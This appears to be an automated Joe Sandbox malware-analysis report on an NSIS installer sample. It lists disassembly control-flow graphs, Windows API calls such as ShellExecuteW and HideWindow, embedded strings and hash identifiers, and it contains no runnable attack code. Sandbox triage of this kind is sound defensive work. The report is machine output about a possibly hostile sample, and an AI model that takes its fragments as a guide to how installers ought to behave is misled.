                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2740478559-0
                                                                    • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                    • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • GlobalFree.KERNELBASE(0064C440), ref: 00402387
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FreeGloballstrcpyn
                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$WarsFeltMadridFarmsPee
                                                                    • API String ID: 1459762280-1231270740
                                                                    • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                    • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    • GlobalFree.KERNELBASE(0064C440), ref: 00402387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 3376005127-0
                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                    • String ID:
                                                                    • API String ID: 2568930968-0
                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                    APIs
                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                    • String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
                                                                    • API String ID: 247603264-1220653561
                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                    APIs
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                    • API String ID: 3156913733-2180253247
                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                    • String ID: HideWindow
                                                                    • API String ID: 1249568736-780306582
                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
